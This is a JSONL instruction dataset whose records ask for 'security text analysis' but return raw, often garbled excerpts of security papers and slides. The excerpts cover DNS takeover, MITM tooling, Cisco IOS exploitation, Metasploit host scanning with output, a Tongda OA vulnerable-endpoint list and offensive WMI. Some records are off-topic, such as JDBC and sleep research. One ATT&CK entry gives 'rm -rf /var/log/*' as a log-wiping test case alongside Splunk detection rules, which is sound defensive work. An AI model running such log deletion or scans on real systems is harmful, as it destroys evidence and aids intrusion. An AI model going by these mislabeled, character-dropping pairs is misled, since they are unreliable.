{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n顶级域攻击与接管指南 > ABOUT ME 0 1  ztz @360高级攻防实验室  专注攻防对抗研究漏洞挖掘武器开发  // Google Hall of Fame  // Golang  // Ruby  // Homebrew > 主要内容 0 2  DNS Protocol 介绍  云 DNS 场景劫持探讨  顶级域 DNS 场景劫持探讨 > DNS 协议 0 3  诞生于 1983 年不断更新到现在  实现主机与 IP 地址转化的互联网电话簿  ICANN 负责域名系统的维护和运作 > DNS 协议 0 4 > 域名组成 0 5 sub.domain.tld. 子域 权威域 顶级域 根域 > 根域 0 6  根域是域名系统中最高级别解析域  根域服务器是 DNS 中最高级别的域名 服务器提供到顶级域服务器的映射  根域服务器地址硬编码在递归 DNS 服 务器中 > 顶级域TLD 0 7  顶级域是互联网域名系统的等级中 位于根域空间的最高级域名由 IANA 管理分发托管商负责  托管商提供某一顶级域下所属域名解 析服务  https://data.iana.org/TLD/tlds-alpha-by- domain.txt > 权威域 0 8  域名注册商面向市场提供权威域购买 和注册服务  权威域由实际购买者负责管理和维护 > 域名组成 0 9 Root$DNS$ Server TLD$DNS$Server Authoritative$ DNS$Server > 注册域名时实际在注册什么 1 0 用户 注册商 a.co a.com TLD Server > 注册域名时实际在注册什么 1 1 用户 注册商 a.co a.com NS ns.a.co TLD Server > 注册域名时实际在注册什么 1 2 用户 ns.a.co Where.is.www.a.com x.x.x.x Authoritative$ DNS$ Server > 权威域 DNS 到底在哪里 1 3  域名注册商通常提供权威域 DNS 解析服务域名购买后默 认使用域名注册商 DNS 托管解析  单独 DNS 解析服务提供商Cloudflare各类云解析 DNS > 云解析 DNS 管理权限交接 1 4  权限交接发生在更换 DNS 托管商时  老 DNS 托管商使用 EPP 协议请求顶级域 Zone file 更新 修改该域名 NS 指向到新 DNS 托管商  顶级域 Zone file 更新权威域 DNS 解析服务器完成指 向更新  云解析 DNS 验证 NS 指向成功用户获得控制台管理 权 > 云解析 DNS 接管风险 1 5  先验证后管理 a.com IN NS ns1.xxyun.com TLD Zone xxyun DNS 用户账户 > 云解析 DNS 接管风险 1 6  孤儿域名已绑定域名被解绑NS 指向未修改 a.com IN NS ns1.xxyun.com TLD Zone xxyun DNS 用户账户 > 云解析 DNS 接管风险 1 7  孤儿域名接管攻击者在控制台添加孤儿域名完成域名接管 a.com IN NS ns1.xxyun.com TLD Zone xxyun DNS 攻击者 > 云解析 DNS 接管风险 1 9 > 云解析 DNS 接管风险 2 0 孤儿域名 + 云 DNS = 云 DNS 域名接管  孤儿域名接管获得域名控制权  云 DNS 解析服务器域名通常托管于该云 DNS 中 > 云解析 DNS 接管风险 2 1  举例说明  某云 DNS 解析服务器 ns1.xxcloud.cn  大量用户域名通过 ns1.xxcloud.com 托管 云 DNS ns1.xxcloud.com 用户 > 云解析 DNS 接管风险 2 2  某云进行架构升级在老 DNS 和用户之间加入一层新 DNS 云 DNS ns1.xxcloud.com 用户 云 DNS ns1.dns-xxcloud.com > 云解析 DNS 接管风险 2 3  因缘巧合此时老 DNS 服务器成为孤儿域名 云 DNS ns1.xxcloud.com 用户 云 DNS ns1.dns-xxcloud.com > 云解析 DNS 接管风险 2 4  攻击者控制台注册老 DNS 服务器接管云 DNS 云 DNS ns1.xxcloud.com 用户 云 DNS ns1.dns-xxcloud.com > 云解析 DNS 接管风险 2 5 > 顶级域 DNS 接管风险 2 6  同样的道理顶级域 DNS 是否存在类似问题 > DNS 解析流程 2 7 Recursive DNS Server Root DNS Server TLD DNS S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChristopher M. Shields r00t0v3rr1d3 Ma1hew M. Toussain 0sm0s1z Chris  Custom Attack Tools and Project Management Matt  Interface Design and Framework Development Basic ARP Poison Heavy Network Traffic Periods of MITM Loss Python Tool With Scapy Intelligent Network Poison Dynamic Poison Retention Ø HTTPS Downgrade Attack Ø Use as a Web Proxy Ø Customizations for Subterfuge A New MITM Tool  Ø Intuitive Interface Ø Easy to use Ø Silent and Stealthy Ø Open Source Ø Server/Client Architecture Ø MITM Utilities Ø Module Builder Ø Configuration Options Ø Credential Harvesting Ø HTTP Code Injection Ø Denial of Service Ø Network View ? ? ?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRecurity Labs GmbH http://www.recurity-labs.com July 26, 2009 Cisco IOS Router Exploitation A map of the problem space Abstract This paper describes the challenges with the exploitation of memory corruption software vulnerabilities in Cisco IOS. The goal is to map out the problem space in order to allow for the anticipation of developments in the future, as current research suggests that exploitation of such vulnerabilities in the wild is not currently the case. By understanding the challenges that an attacker faces, defensive strategies can be better planned, a required evolution with the current state of Cisco IOS router networks. Author Felix 'FX' Lindner Head of Recurity Labs Recurity Labs white-paper Cisco IOS Router Exploitation 1 Introduction Successful exploitation of software vulnerabilities in Cisco IOS has been shown independently by different researchers and groups in the past, employing different techniques and basing of different assumptions. Notable incidents using targeted exploits against Cisco IOS vulnerabilities, known or unknown, have however not been registered by the security community at large. With the development of the Cisco Incident Response tool and free on-line service1, Recurity Labs aimed at the identification of successful compromises of Cisco IOS routers. Since the initial offering of the service, it became apparent that attackers targeting network infrastructure equipment still rely largely on mis-configurations and functional vulnerabilities, such as CVE-2008-0960. This observation indicates a fundamental difference between infrastructure attacks and attacks against network leaf nodes, such as servers and clients of any kind. This paper will highlight reasons for the lack of binary exploits and which developments will herald the dawn of reliable remote exploitation of Cisco IOS based network infrastructure equipment. The author strongly believes that eventually, attacks on network infrastructure will use binary exploitation methods", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1027-005-linux-主机上的监测组件删除 ## 来自ATT&CK的描述 攻击者可能会删除或更改主机系统上生成的记录包括日志和可能捕获的文件例如隔离的恶意软件日志的位置和格式会有所不同但攻击者的操作行为都会被操作系统进行记录比如典型的windows日志linux和Mac的bash历史记录或者/var/log下的日志文件 攻击者干扰事件的记录可以破坏安全设备的检测与告警从而导致恶意攻击事件未被通报由于缺乏足够的数据来确定发生的异常情况还可能使安全人员的分析和事件响应更加困难 ## 测试案例 rm -rf /var/log/* ## 检测日志 linux audit日志 值得注意的是Ubuntu默认情况下没有audit需要下载安装并配置相关策略 bash历史记录 ## 测试复现 icbc@icbc:/$ sudo rm -r /var/log/icbc.log ## 测试留痕 基于audit日志 暂无 基于bash历史记录 icbc@icbc:/$ history 20 sudo rm -r /var/log/icbc.log 注意这里删除的是测试log文件 ## 检测规则/思路 ### splunk检测规则 #### 基于audit日志 index=linux sourcetype=linux_audit syscall=263 | table host,auid,uid,euid,exe,key index=linux sourcetype=linux_audit type=PATH name=*.log nametype=delete #### 基于bash历史记录 index=linux sourcetype=\"bash_history\" rm * .log | table host, user_name, bash_command ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1027-005 <https://attack.mitre.org/techniques/T1027/005/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1986 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms are permitted .\\\" provided that the above copyright notice and this paragraph are .\\\" duplicated in all such forms and that any documentation, .\\\" advertising materials, and other materials related to such .\\\" distribution and use acknowledge that the software was developed .\\\" by the University of California, Berkeley. The name of the .\\\" University may not be used to endorse or promote products derived .\\\" from this software without specific prior written permission. .\\\" THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR .\\\" IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED .\\\" WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. .\\\" .\\\" .TH RESOLVER 5 \"November 11, 1993\" .UC 4 .SH NAME resolver \\- 解析器(resolver) 配置文件 .SH \"总览 (SYNOPSIS)\" /etc/resolv.conf .SH \"描述 (DESCRIPTION)\" .LP .I 解析器(resolver) 是 C 函数库 中 的 一组 例程, 用于 访问 Internet 域名系统. 当 某个 进程 第一次 调用 这些函数 时, 它们 读取 解析器配置文件 的 内容. 这个文件 很容易 理解, 它 由 关键字 和 对应值 的 列表 组成, 提供 各种类型 的 解析器信息. .LP 正常 配置 的 系统 中, 这个 文件 并非 必不可少: 名字服务器 可以 位于 本机, 域名 从 主机名 中 获得, 域名搜索路径 由 域名 产生. .LP 各种配置选项有: .TP \\fBnameserver\\fP 名字服务器 的 Internet 地址, 用于 解析器 查询. 最多 可以 列出 MAXNS (目前是 3) 个 名字服务器, 一个关键字 对应 一个服务器. 如果 列出 多个 服务器, 解析器 按照 列举的顺序 访问. 如果 没有 给出 \\fBnameserver\\fP 项, 缺省方法 是 使用 本机的 名字服务. (使用的算法 是 先试 第一个 名字服务器, 如果 请求 超时, 就试 下一个 服务器, 直到 试遍 所有的 服务器. 然后 重复 这个过程, 直到 最大 重试次数). .TP \\fBdomain\\fP 本地域名. 多数 对 本域内 的 名字查询 能够 使用 对应的 短名字. 如果 \\fBdomain\\fP 项 不存在, 本地域名 取决于 \\fIgethostname\\fP\\|() 返回的 主机名: 第一个 '.' 以后的 所有内容 都是 域名 部分. 最后, 如果 主机名 不含有 域名 部分, 就认为 指定了 根域. .TP \\fBsearch\\fP 主机名查询 的 查找列表. 查找列表 一般 取决于 本地域名; 缺省情况下 就是 本地域名. 这一点 可以 改变, 在 关键字 \\fIsearch\\fP 后面, 隔着 空格 或 制表符, 列出 期望的 域名查找路径. 多数 解析请求 会 按顺序 尝试 查找路径 里的 每一个 成员, 直到 发现 匹配项. 注意, 如果 所列域名 对应的 服务器 不在 本地网络, 这个 过程 可能 很慢, 而且 生成 大量的 网络数据, 如果 其中的 某个域名 没有 对应的 服务器, 将导致 请求 超时. .IP 目前, 查找列表 限制在 六个 域名 内, 总共 不超过 256 个字符. .TP \\fBsortlist\\fP 排序", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**注**请多喝点热水或者凉白开可预防**肾结石通风**等 痛风可伴发肥胖症高血压病糖尿病脂代谢紊乱等多种代谢性疾病 **攻击机** 192.168.1.5 Debian **靶机** 192.168.1.2 Windows 7 192.168.1.115 Windows 2003 192.168.1.119 Windows 2003 **第一季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/discovery/arp_sweep * auxiliary/scanner/discovery/udp_sweep * auxiliary/scanner/ftp/ftp_version * auxiliary/scanner/http/http_version * auxiliary/scanner/smb/smb_version **第二季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/ssh/ssh_version * auxiliary/scanner/telnet/telnet_version * auxiliary/scanner/discovery/udp_probe * auxiliary/scanner/dns/dns_amp * auxiliary/scanner/mysql/mysql_version **第三季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/netbios/nbname * auxiliary/scanner/http/title * auxiliary/scanner/db2/db2_version * auxiliary/scanner/portscan/ack * auxiliary/scanner/portscan/tcp ### 十一基于auxiliary/scanner/netbios/nbname发现内网存活主机 ```bash msf auxiliary(scanner/netbios/nbname) > show options Module options (auxiliary/scanner/netbios/nbname): Name Current Setting Required Description     BATCHSIZE 256 yes The number of hosts to probe in each set RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 137 yes The target port (UDP) THREADS 50 yes The number of concurrent threads msf auxiliary(scanner/netbios/nbname) > exploit [*] Sending NetBIOS requests to 192.168.1.0>192.168.1.255 (256 hosts) [+] 192.168.1.2 [JOHNPC] OS:Windows Names:(JOHNPC, WORKGROUP, __MSBROWSE__) Addresses:(192.168.1.2, 192.168.163.1, 192.168.32.1)Mac:4c:cc:6a:e3:51:27 [+] 192.168.1.115 [VM_2003X86] OS:Windows Names:(VM_2003X86,WORKGROUP) Addresses:(192.168.1.115) Mac:00:0c:29:af:ce:cc Virtual Machine:VMWare [+] 192.168.1.119 [WIN03X64] OS:Windows User:ADMINISTRATOR Names:(WIN03X64, WORKGROUP, ADMINISTRATOR) Addresses:(192.168.1.119)Mac:00:0c:29:85:d6:7d Virtual Machine:VMWare [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed ``` ![](media/a6a129d13e2d9bf59ea2604e2209c628.jpg) ### 十二基于auxiliary/scanner/htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat we'll cover How online intelligence gathering differs from traditional intelligence gathering The difference between intelligence and espionage Corporate Dash boards Tips from the field Opportunities for the community Who am I? MikeSchrenk@yahoo.com Minneapolis-based consultancy: Michael Schrenk Ltd. (www.schrenk.com) Write Webbots and Spiders for corporate clients DEFCON X, Introduction to Writing Spiders and Web Agents. Also write, speak and teach Intelligence = Information In a business sence, you want to know: What can you learn about your competition? What do people know about you? Are people stealing from you? The most important thing is... What can you predict? Collect library of information Compare changes Definitions Intelligence is not necessarily: Espionage spying, launching trojans Wiretapping A covert action Tampering with a situation to change A Strategy An Election Traditional sources for collecting corporate intel Go to conferences, Hire your competition's employees, Lookup patent records, Use secret shoppers, Study help wanted ads, Read trade publications, Talk to vendors Disadvantages of Traditional corporate intel Mostly after-the-fact Requires contact Mostly one-time activitiesmust be repeated Cannot be done anonymously Can be expense Gathering online intel means learning new habits Web agents determine how you use the Internet Browsers Mail clients News readers Telnet Competitive advantages come when you perform better and differently. Webbots/Spiders Advantages of online corporate intelligence Can be done from a distance (with stealth) Can be automated Can be done anonymously (for the most part) Reduces or eliminates latency between when an event happens and a decision can be made Can be interactive Can create relevance that traditional methods cannot Online Corporate Intel most effective when... It is automated Data can be parsed and stored in a database Stores data over a period of time Creates context by combining various data from a va", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 数据访问 **什么是JDBC** Java 数据库连接Java Database Connectivity简称 JDBC是 Java 语言中用来规范客户端程序如何来访问数据库的应用程序接口提供了诸如查询和更新数据库中数据的方法JDBC 也是 Sun Microsystems 的商标我们通常说的 JDBC 是面向关系型数据库的 JDBC API 主要位于 JDK 中的 java.sql 包中之后扩展的内容位于 javax.sql 包中主要包括斜体代表接口需驱动程序提供者来具体实现 - DriverManager负责加载各种不同驱动程序Driver并根据不同的请求向调用者返回相应的数据库连接Connection - Driver驱动程序会将自身加载到 DriverManager 中去并处理相应的请求并返回相应的数据库连接Connection - Connection数据库连接负责与进行数据库间通讯SQL 执行以及事务处理都是在某个特定 Connection 环境中进行的可以产生用以执行 SQL 的 Statement - Statement用以执行 SQL 查询和更新针对静态 SQL 语句和单次执行PreparedStatement用以执行包含动态参数的 SQL 查询和更新在服务器端编译允许重复执行以提高效率 - CallableStatement用以调用数据库中的存储过程 - SQLException代表在数据库连接的建立和关闭和 SQL 语句的执行过程中发生了例外情况即错误 **什么是数据源** 可以看到在 java.sql 中并没有数据源Data Source的概念这是由于在 java.sql 中包含的是 JDBC 内核 API另外还有个 javax.sql 包其中包含了 JDBC 标准的扩展 API而关于数据源Data Source的定义就在 javax.sql 这个扩展包中 实际上在 JDBC 内核 API 的实现下就已经可以实现对数据库的访问了那么我们为什么还需要数据源呢主要出于以下几个目的 1. 封装关于数据库访问的各种参数实现统一管理 2. 通过对数据库的连接池管理节省开销并提高效率 --- ## JdbcTemplate **数据源配置** 首先为了连接数据库需要引入 jdbc 支持在 pom.xml 中引入如下配置 ```xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-jdbc</artifactId> </dependency> ``` **嵌入式数据库支持** 嵌入式数据库通常用于开发和测试环境不推荐用于生产环境Spring Boot 提供自动配置的嵌入式数据库有 H2HSQLDerby你不需要提供任何连接配置就能使用 比如我们可以在 pom.xml 中引入如下配置使用 HSQL ```xml <dependency> <groupId>org.hsqldb</groupId> <artifactId>hsqldb</artifactId> <scope>runtime</scope> </dependency> ``` **连接生产数据源** 以 MySQL 数据库为例先引入 MySQL 连接的依赖包在 pom.xml 中加入 ```xml <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> </dependency> ``` 在 src/main/resources/application.properties 中配置数据源信息 ```conf spring.datasource.url=jdbc:mysql://localhost:3306/test spring.datasource.username=dbuser spring.datasource.password=dbpass spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver ``` 注意因为 Spring Boot 2.1.x 默认使用了 MySQL 8.0 的驱动所以这里采用 com.mysql.cj.jdbc.Driver而不是老的 com.mysql.jdbc.Driver. **连接JNDI数据源** 当你将应用部署于应用服务器上的时候想让数据源由应用服务器管理那么可以使用如下配置方式引入 JNDI 数据源 ``` spring.datasource.jndi-name=java:jboss/datasourc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeaponizing the Web More Attacks on User Generated Content Saturday, August 1, 2009 Black Hat USA 2009 Comrades Citizen: Nathan Hamiel Senior Consultant - Idea InfoSec Associate Prof @UAT, Hexagon Security Group 23rd Degree Mason, LavaRolling Enthusiast Citizen: Shawn Moyer Principal Consultant - FishNet Security Douchebag with microphone, self-styled Wikipedian Shot a man in Reno just to watch him die Saturday, August 1, 2009 Black Hat USA 2009 Preview for the ADHD  Navel gazing and rants  Democratization of misinformation  Trust, integration, and shared exposure  Features arms race, emerging attack surface  Actual information and content  A nifty (we think) approach to an old bug  Tool release, ensuing demos o' fail  Stupid API tricks and multi-site mayhem  Sorry, you have to listen to rants first. =) Saturday, August 1, 2009 Black Hat USA 2009 Voice of the people  User-Generated Content  User-driven, social, collaborative content  Blogs, wikis, socnets, web communities  Increasingly bolted onto old web media  Integrated, Aggregated, Dynamic  Offsite content, syndication, shared APIs  Aggregation points, feeds, personal portals  Increasing client-side logic (REST, JSON, etc) Saturday, August 1, 2009 Black Hat USA 2009 What could possibly go wrong?  Moot is Time's person the year  Lulzy example. Larger problem.  Time: Feh. Internet polls aren't trusted. Oh. Saturday, August 1, 2009 Black Hat USA 2009 What could possibly go wrong?  Post-MJ celebrity death hoaxes  Some real news outlets picked up.  iReport, uReport, you are on notice.  Note: Please stop Rickrolling. Please. Saturday, August 1, 2009 Black Hat USA 2009 What could possibly go wrong?  NYT aggregation fail  HTML injection article propagates HTML injection  Aggregation, syndication, shared exposure Saturday, August 1, 2009 Black Hat USA 2009 What could possibly go wrong?  DailyKos trolls twittering dittoheads  Fake economy / budget numbers  $3 million for replacement tires for 1992-1995 Geo Metros.  $750,0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Sleep: How to Build Your Very Own Sleep Lab Ne0nRa1n & Keith Biddulph present... Human Sleep Sleep is a normal state of rest that is characterized by unconsciousness, reduced activity, and limited sensory responsiveness Sleep differs from other states of reduced consciousness such as drug intoxication or coma, because it is spontaneous, periodic, and readily reversible Wakefulness is characterized by consciousness, sensory responsiveness, and purposeful activity Sleep in Non-Humans Some animals never exhibit a state that meets the behavioral definition of sleep Some marine mammal species do not show evidence for REM sleep, and convincing evidence for this state in reptiles, fish and insects is lacking The enormous variation in the nature of rest and sleep states across the animal kingdom and within the mammalian class has important implications for understanding the evolution and functions of sleep Discovery of REM REM was discovered by accident in 1952 The discovery of REM sleep was the single event that hallmarked the onset of the modern era of sleep research Researchers have yet to agree on the function of REM Stages of Sleep Four Non-REM Stages of Sleep REM Stage Wakefulness Sleeping and Waking Biological Clock Circadian Rhythm Homeostatic Sleep Propensity Incandescent Light The first incandescent electric light was made in the 1800's Electric light can affect circadian rhythm Circadian rhythm disruptions may be a cause of health problems Aging and Sleep The patterns of REM and NREM sleep show developmental changes as we age As children grow, they sleep for longer periods at a time, with fewer sleep periods in a day, until achieving the adult pattern of a single sleep period each day In most adults, the amount of nightly sleep remains fairly stable until old age Larks and Owls Chronotype Moring Larks Evening Owls Sleep Debt Sleep debt is the cumulative effect of not getting enough sleep There are two kinds of sleep debt caused by partial sleep deprivatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n络安全 移动安全 招聘信息 English NSA和FBI联合曝光俄罗斯开发的Lin... HW防守  如何做名优秀的监控/研判...  HW前的礼盒:通达OA 0day请查收 2020-08-16 22:08 即将迎来安全圈内的场博弈由于2015以及2017版本已不在更新且在补天平台通 达专属商也不再收低版本的漏洞我决定在正式开始之前公布通达OA些历史遗 留问题下公布的\"0day\"在官最新版本2019中已经修复些官还未审 核未在最新版中修复的漏洞会在后续修复后持续更新检测具 ADS 随机推荐 四川省某市政府信息公开系统漏洞导致 敏感内容泄露(影响个部) 知道创宇为湖湘杯安全赛提供全程 持 Android Content Provider Security 万户络条件SQL注 XSS教程档 看我如何利单注点从Firefox浏览 器中提取CSS数据 多个Moxa AWK-3131A控线络 设备漏洞可导致任意代码执 肖云原安全下看企业新边界 身份管理 个隐私信息泄露不仅仅发在明星身 上 从RSAC创新沙盒2020看隐私数据保 护 标签云 漏洞[7275] 注[3125] Web安全[1502] xss[1313] 具[1013] 系统安全[904]  络安全[807] 技术[716] 业动态[673] 技 术分享[660] CMS[652] Android[586] 动 记录客技术中优秀的内容,传播客化,分享客技术精华 由于通达OA涉及的户量众多为防攻击利\"0day\"获取服务器权限等特此 将这些未公开但已修复的危漏洞整理本并附检poc公众号回复通达OA 即可获得供蓝队同仁使提前做好防护 本不会过多讲解漏洞相关细节请勿将提供的检具于违法为否则后果 负 前台SQL注 由于编码原因低版本的通达OA前台注还是有些的这只整理本发现的且在最 新版本(2019)中已经修复的利点 1. ispirit/retrieve_pwd.php 影响版本2015官当前的2015也已经修复-20192019最近更新的版本已修 复 利条件 态[566] 业界[541] 客[525] 漏洞分析 [471] 安全报告[466] 渗透测试[465] 攻击 [460] 终端安全[459] 组合漏洞RCE 任意件上传 影响版本2015-2017 利条件需要任意户登录录不可控且当前录权限执脚本件 1. general/reportshop/utils/upload.php 代码图截2015版 件包含 影响版本2015-2017 利条件只能包含指定php件 1. inc/second_tabs.php 为防利poc做违法攻击为检测具中不给出相应payload仅提示存在漏洞 件请查看代码检测并修复漏洞 件包含 影响版本2015-2017 利条件需要任意户登录只能包含指定php件 1. general/reportshop/utils/upload.php 代码图截2015版 为防利poc做违法攻击为检测具中不给出相应payload仅提示存在漏洞 件请查看代码检测并修复漏洞 任意件上传 影响版本2015-2017 利条件需要任意户登录 1. mobile/reportshop/report/getdata.php 代码图截2015版 任意件删除 影响版本2015-2017 利条件需要任意户登录 1. general/reportshop/utils/upload.php 代码图截2015版 写在后 由于并未精确测试漏洞影响的版本可能与中所描述有所偏差请检由于 通达OA2015-2017版本的户较多且官已不怎么维护因此提前放出存在的 隐患望各位防守同仁尽快发现并修复漏洞后会持续更新检测具还有很 提交评论 多洞由于未修复等原因暂时法透露过多接下来会根据情况发布漏洞的详细信息 及其他漏洞的利 坚守阵地 我顶 0 我踩 知识来源: https://mp.weixin.qq.com/s? __biz=MzU0ODg2MDA0NQ==&mid=2247484338&idx=1&sn=e14e918bdd197047d7c92c693c8702f5&c hksm=fbb9fa50ccce7346d1c95f290311fbde988a07e844e02502fedddca273b045bf2e41b3b8c221&mps hare=1& 阅读:6983 | 评论:0 | 标签:0day 想收藏或者和家分享这篇好章复制链接地址 HW前的礼盒:通达OA 0day请查收共有0条留 发表评论 姓名: 邮箱: 址: 验证码: 84减 加46是5 客技术  2012-2020 | 关于&合作 | 京ICP备15005440号", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n序 推荐序 随着远程办公等应用的爆发零信任安全理念得到迅速发展中国产业互联网发展联盟零信任产业标准工 作组集结业界优势机构基于实战经验和研究积累研制和推出本白皮书希望能为零信任产业发展带来新动 能中国产业互联网发展联盟秘书长 雷晓斌 本白皮书基于产业实践给出了详细的技术实现和应用案例为安全从业者提供了很好的借鉴随着零信 任理念在国内的快速普及和落地相关产品和解决方案要更加重视合规要求这是安全管理的需要也是能被市 场认可的基础公安部第三研究所(国家网络与信息系统安全产品质量监督检验中心)副主任 顾健 零信任实战白皮书的发布期待能为企业安全管理者技术研发和运维等人员提供有价值的参考腾讯基 于超大型企业网络安全建设实战和诸多客户环境部署经验贡献了架构方案技术实现和大量应用场景案例 基于实战面向未来腾讯企业IT部副总经理 黄李明 网络安全是没有硝烟的战场攻防无异于一场场战斗而现实的战争模式一直在进化从一战的堑壕战到 二战的立体化运动战跟不上进化节奏的一方将会一败涂地如同二战初期贯彻运动战思想的德军横扫还抱 着堑壕战思想的法军类比一下传统的划分区域的安全防护模式就如同堑壕战想依赖几条防线来挡住各种 层出不穷的攻击形式已经力不从心了而基于零信任原则的安全防御则相当于立体化运动战机动防御这样 才能在越来越复杂的网络攻击形势下建立起稳固的安全阵地 腾讯游戏CROS助理总经理 刘栖铜陈冬 零信任产业标准工作组成立后短时间就推出白皮书这一工作成果我相信白皮书能够促进产业界各方 交流指导相关产品研发我期待对企业客户白皮书能够普及零信任安全理念加快零信任应用实践从 而在整体上提升企业安全等级绿盟科技副总裁 李晨 网络安全攻防的发展是拉锯式的双方的成败都是在此消彼长之间因此不存在绝对的安全也不存在 无法防御的威胁网络安全从业者在不断的实践中找寻解决方案希望能够为有价值的目标提供持续动态的 防护天融信高级副总裁 杨斌 零 信 任 实 战 白 皮 书 序 零信任产业标准工作组 编制组自序 零信任产业标准工作组以下称工作组作为国内率先提出将零信任产业化与标准化相结合发展的专业 组织截止本白皮书发布时间成员单位已包含国内22家零信任产学研用的权威机构工作组的使命和目标 是以标准化为纽带促进零信任产业规模化发展为用户提供标准可信赖的零信任产品和服务 零信任实战白皮书作为工作组第一项正式发布的研究成果以国内产业界的工程实践和依托零信任架 构开展的真实攻防实战经验为基础全面且详细地介绍了零信任理念零信任与传统边界安全理念的关系零 信任参考架构零信任实现方案零信任应用场景零信任落地指引行业客户案例探索和展望等方面的内 容供所有对零信任感兴趣的读者交流和参考 由于零信任理念在业界处于快速普及和发展的阶段本书内容仅代表编制组专家们的理解和实践经验大 部分编制组专家平时专注于技术研究和产品研发并非专业的写手专家们牺牲了大量个人休息时间对白皮 书内容进行研制和讨论希望尽可能准确和完整的呈现基于实战的零信任理念全貌即便如此由于时间仓 促编制过程中也难免存在理解不准确或者文字表达谬误之处欢迎读者们多提宝贵意见 零 信 任 实 战 白 皮 书 序 零信任产业标准工作组 本白皮书版权属于零信任产业标准工作组并受法律保护转载摘编或利用任何其他方式使用白皮书文 字或观点的均应注明来源零信任产业标准工作组违反以上声明者工作组将保留追究其相关法律责任 的权利 编制单位 腾讯科技深圳有限公司完美世界控股集团有限公司北京天融信网络安全技术有限公司公安部第 三研究所绿盟科技集团股份有限公司北京蔷薇灵动科技有限公司中国移动通信集团设计院有限公司任 子行网络技术股份有限公司上海观安信息技术股份有限公司中孚信息股份有限公司深圳市网安计算机安 全检测技术有限公司国家计算机网络应急技术处理协调中心北京芯盾时代科技有限公司腾讯云计算(北 京)有限责任公司 蔡东赟何艺龙凡刘治平陈妍刘弘利李小鹏杜雪涛张晨赵蓓王先高谢江王卫峰 洪跃腾程建明赵芸伟李凯黄超刘海涛翟尤曹静孙少波谢仪頔 编制人员 版权声明 零 信 任 实 战 白 皮 书 版 权 声 明 零信任产业标准工作组 零信任概述 1.1 产生背景 1.2 零信任原则 1.3 标准化进展 零信任与传统边界安全理念的比较 2.1 传统边界安全理念 2.2 零信任理念 2.3 零信任与传统安全产品/设备的关系 零信任参考架构 3.1 SDP架构概述 3.2 NIST零信任架构概述 3.3 通用参考架构 零信任实现方案 4.1 用户对资源访问模式实现 4.2 服务之间调用模式实现 零信任应用场景 5.1 办公安全 5.2 数据中心内部访问 5.3 大数据 5.4 物联网 5.5 多云安全访问和混合云服务器运维 5.6 私有机房对外访问入口的安全防护 零信任落地指引 6.1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本篇文章翻译自Offensive WMI - The Basics (Part 1) :: 0xInfection's Blog  Random ramblings of an Infected Geek. 这篇文章是有关 WMI 的多篇系列文章中的第一篇如果读者对 PowerShell 有个基本的了解那么对阅 读本篇文章会有所帮助但这不是必需的 一介绍 1.1 为何是 WMI WMI 是 Microsoft 的一组规范旨在对 Windows 系统进行快速高效的管理正如你可能知道的那样 一项安全规则表明任何对管理有用的东西也很容易被不法分子滥用WMI 确实可以做很多事情  从 收集计算机状态和配置设置到运行应用程序和执行代码此外WMI 存在于所有可用的 Windows 操作 系统版本中因此这里的目标范围非常广泛 1.2 什么是 WMI 让我们快速回顾一些重要术语WMI 是 Windows Management Instrumentation 的缩写它是 Microsoft 对 CIM (Common Information Model通用信息模型) 和 WBEM (Web-Based Enterprise Management基于 Web 的企业管理) 的实现  这两者都是 DMTF (Distributed Management Task Force分布式管理任务组) 标准WMI 为应用程序或脚本提供了一个整洁统一的界面来管理计算机 (可 能是远程的也可能是本地的)  包括进程服务等 1.3 WMI 体系架构 了解体系架构对于了解整个 WMI 生态系统的工作方式非常重要WMI 架构如下所示 (源于 Graeber 在 BHUSA 15 的演讲) 让我们来逐一了解主要组件 Clients/Consumers基本上是与 WMI 类交互 (查询数据运行方法等) 终端比较有代表性的客 户端包括 wmic.exe  wbemtest.exe  winrm.exe VBScript/JScript 和 ofc PowerShell cmdlets Query Languages就像 SQL 提供查询数据库的方法一样WMI 也有用于查询 WMI 服务的 WQL (WMI 查询语言) / CQL在管理远程盒子方面WBEM 标准开始发挥作用其中包括 DCOM 和 WS-Man 